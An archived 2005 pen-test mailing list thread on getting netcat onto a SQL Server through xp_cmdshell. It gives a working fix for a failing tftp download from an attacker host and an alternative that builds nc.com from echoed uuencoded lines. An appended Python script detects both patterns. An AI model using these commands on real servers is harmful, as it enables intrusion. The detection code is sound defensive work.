Re: TFTP and XP_CMDSHELL - Weird - SOLVED

From: Andres Molinetti (andymolinetti@hotmail.com)
Date: Fri Jun 24 2005 - 08:45:40 EDT


I finally worked it out.

The problem is the following:

SQL Server is running as a low-privileged account.

When you run a command with xp_cmdshell your working directory is
"winnt\system32".
I was running "master.dbo.xp_cmdshell 'tftp -i myHost GET nc.exe c:\nc.exe'"
and it was failing.

The "bug" is that the tftp client tries to create a temporary file when you
start a download, and it does so in your WORKING DIRECTORY, not in the
destination folder.
So for the command to run properly you need to have write privileges in
the destination folder AND IN THE WORKING DIRECTORY.

Now this works "master.dbo.xp_cmdshell 'cd c:\winnt\temp & tftp -i myHost
GET nc.exe c:\nc.exe'".

Besides, it seems to be a good point to include in future SQL Injection
papers, because I haven't seen this anywhere before.

I don't know whether to call this a tftp client bug, but surely it's not a
reasonable way of working.

Thank you all for the help,
cheers

Andy.

>From: Javier Fernandez-Sanguino <jfernandez@germinus.com>
>To: Andres Molinetti <andymolinetti@hotmail.com>
>CC: pen-test@securityfocus.com
>Subject: Re: TFTP and XP_CMDSHELL - Weird
>Date: Thu, 23 Jun 2005 19:24:02 +0200
>
>Andres Molinetti wrote:
>
>>I think the problem is the tftp client. Does anyone know if MS has fixed
>>it in anyway not to allow downloads from low-privileged users?? or
>>something like that??
>
>Why use tftp? You can just create a uuencoded file that will auto-decode
>itself when run. Try using
>
>xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'
>xp_cmdshell 'echo
>M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U >>c:\nc.com'
>xp_cmdshell 'echo
>M+4Y%5%-%3D1?5C$N,#!?2E)4/0T*0T9&1E)8+&`L8#(D1CU`(70N<E$P)4EU >>c:\nc.com'
>(...)
>
>and so on. I'll leave the rest up to you. There are some caveats when you
>want to pull that through HTTP but it works every time.
>
>Regards
>
>Javier
>
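The two file-transfer patterns discussed in this thread (tftp GET after a cd into a writable directory, and a uuencoded file assembled with echo >> appends) are easy to pick out of xp_cmdshell audit records. The following is an added example for defenders, not code from the thread or from either poster; it assumes audit lines that carry the xp_cmdshell command text, and the sample lines below are constructed from the commands quoted above.

```python
import re

# Indicators for the two transfer patterns from the thread. Dict order is the
# order in which hits are reported.
INDICATORS = {
    # tftp client download; the thread's case is 'tftp -i host GET file dest'
    "tftp_get": re.compile(r"\btftp\b[^&|;]*\bget\b", re.I),
    # 'cd <dir> & tftp ...': the workaround for the client writing its temp
    # file into the working directory (system32 under xp_cmdshell) rather
    # than the destination folder; a cd right before tftp is a strong tell
    "workdir_change_then_tftp": re.compile(r"\bcd\s+\S+\s*&\s*tftp\b", re.I),
    # uuencode header appended to a file: 'echo begin 666 name >>file'
    "uuencode_header": re.compile(r"\becho\s+begin\s+[0-7]{3}\s+\S+\s*>>", re.I),
    # a full uuencode body line: 'M' plus 60 chars from the range ' '..'`'
    "uuencode_body": re.compile(r"\becho\s+M[ -`]{60}\s*>>"),
}

# Constructed sample audit lines (not real telemetry), built from the
# commands quoted in the thread plus one benign line.
SAMPLE_EVENTS = [
    r"xp_cmdshell 'tftp -i myHost GET nc.exe c:\nc.exe'",
    r"xp_cmdshell 'cd c:\winnt\temp & tftp -i myHost GET nc.exe c:\nc.exe'",
    r"xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'",
    r"""xp_cmdshell 'echo M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U >>c:\nc.com'""",
    r"xp_cmdshell 'dir c:\reports'",
]


def classify(event):
    """Return the names of every indicator that matches one audit line."""
    return [name for name, rx in INDICATORS.items() if rx.search(event)]


def scan(events):
    """Return (line, indicators) for every line with at least one hit."""
    hits = []
    for event in events:
        names = classify(event)
        if names:
            hits.append((event, names))
    return hits


if __name__ == "__main__":
    for line, names in scan(SAMPLE_EVENTS):
        print(", ".join(names), "<-", line)
```

A single uuencode_body hit is weak on its own; the header line followed by a burst of body appends to the same destination file is the pattern worth alerting on.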




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:29 EDT